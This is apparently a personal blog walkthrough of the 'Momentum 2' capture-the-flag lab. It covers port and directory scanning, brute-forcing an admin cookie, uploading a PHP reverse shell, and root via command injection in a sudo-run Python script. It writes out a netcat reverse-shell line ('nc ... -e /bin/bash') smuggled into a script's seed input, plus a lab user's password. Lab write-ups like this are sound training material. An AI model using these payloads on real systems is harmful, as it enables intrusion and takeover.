Overview:
Target Machine IP Address: 192.168.56.125 My Machine IP Address: 192.168.56.1
Mission:
Boot to Root
- To get user flag
- To get root flag
- To get root access
Level: Easy/MediumΒ
Easy/Medium
Download:
You can download the machine from here.
Information Gathering & Scanning Process:
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Target IP: 192.168.56.125
nmap -sC -sV -p- -Pn 192.168.56.125 -o nmap.log
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA) | 256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA) | 256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-methods: | Supported Methods: HEAD GET POST OPTIONS |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Momentum 2 | Index Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1 HTTP
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -u 192.168.56.125 -o gobuster.log
__$ cat gobuster.log /img (Status: 301) /index.html (Status: 200) /css (Status: 301) /ajax.php (Status: 200) /ajax.php.bak (Status: 200) /manual (Status: 301) /js (Status: 301) /dashboard.html (Status: 200) /owls (Status: 301) /server-status (Status: 403)
dirsearch -u http://192.168.56.125 -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f
http://192.168.56.125:80/ajax.php.bak http://192.168.56.125:80/ajax.php http://192.168.56.125/css/ http://192.168.56.125/dashboard.html http://192.168.56.125/img/ http://192.168.56.125/js/ http://192.168.56.125/manual/
I checked all the directories. I am going to explore more on dashboard.html and js
function uploadFile() {
var files = document.getElementById("file").files;
if(files.length > 0 ){
var formData = new FormData();
formData.append("file", files[0]);
var xhttp = new XMLHttpRequest();
// Set POST method and ajax file path
xhttp.open("POST", "ajax.php", true);
// call on request changes state
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var response = this.responseText;
if(response == 1){
alert("Upload successfully.");
}else{
alert("File not uploaded.");
}
}
};
// Send request with data
xhttp.send(formData);
}else{
alert("Please select a file");
}
}
http://192.168.56.125/dashboard.html
I thought to upload a PHP webshell, let’s try
cp /usr/share/webshells/php/php-reverse-shell.php .
Note: you need to update the IP and port number
I was not lucky to upload the shell, so I thought I need to take sometime and test with other file format.
touch test.txt
upload the file and it went through without any error and the uploaded file is reflecting at http://192.168.56.125/owls (this is good catch though ;))
$cat ajax.php.bak
//The boss told me to add one more Upper Case letter at the end of the cookie
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
//[+] Add if $_POST['secure'] == 'val1d'
$valid_ext = array("pdf","php","txt");
}
else{
$valid_ext = array("txt");
}
// Remember success upload returns 1
Based on the above condition, I have written a bash script
#!/usr/bin/bash
for i in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$i >> cookie.txt; done
Besides, if we could get the right cookie value of admin, we can also upload the php file, which means our file is ready π
My plan is to fireup BurpSuite and send brute force the cookie value with the data set which we just prepared (cookie.txt).
POST /ajax.php HTTP/1.1 Host: 192.168.56.125 Content-Length: 5717 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySdAdUP2K6pJ876kK Accept: */* Origin: http://192.168.56.125 Connection: close Referer: http://192.168.56.125/dashboard.html Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: admin=password ------WebKitFormBoundarySdAdUP2K6pJ876kK Content-Disposition: form-data; name="secure" val1d ------WebKitFormBoundarySdAdUP2K6pJ876kK Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/x-php
And then let’s send the request to Repeater and check the response. If it is showing 0 or 1 that means it is working.
By the way, file gets uploaded at http://192.168.56.125/owls/
Yeah, let’s get the reverse shell now π
Boom!! We got the user level access !!
We got two users.
username: athena password: myvulnerableapp*
I was quite happy to see that python thing lol but was not able to exploit that, so I had to try the cookie-gen.py file. Let’s first see the code, what it is trying to do …
import random
import os
import subprocess
print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input("Enter the seed : ")
random.seed = seed
cookie = ''
for c in range(20):
cookie += random.choice(chars)
print(cookie)
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)
Although the script shows that the input getting outputed however, I am absolute sure regarding code execution, so I tried my luck (click on screenshot to view in large format)
Since the program could run with sudo so I am certain that we can get root. Let’s see π
On Kali Linux Machine
nc -lvp 1234
On Victim Machine
sudo python3 /home/team-tasks/cookie-gen.py ;nc 192.168.56.1:1234 -e /bin/bash;
Today, I had a wonderful time because I had a meeting with one colleague over video call for 4 hours and learned alot regarding DNS and firewalling. And then resumed my shelling π By the way, evening prayers was done before the conference because I was afraid it will take more time and at the end I will end up praying sluggishly lol. Anyway, that’s all.. Catch you tomorrow with a new box π
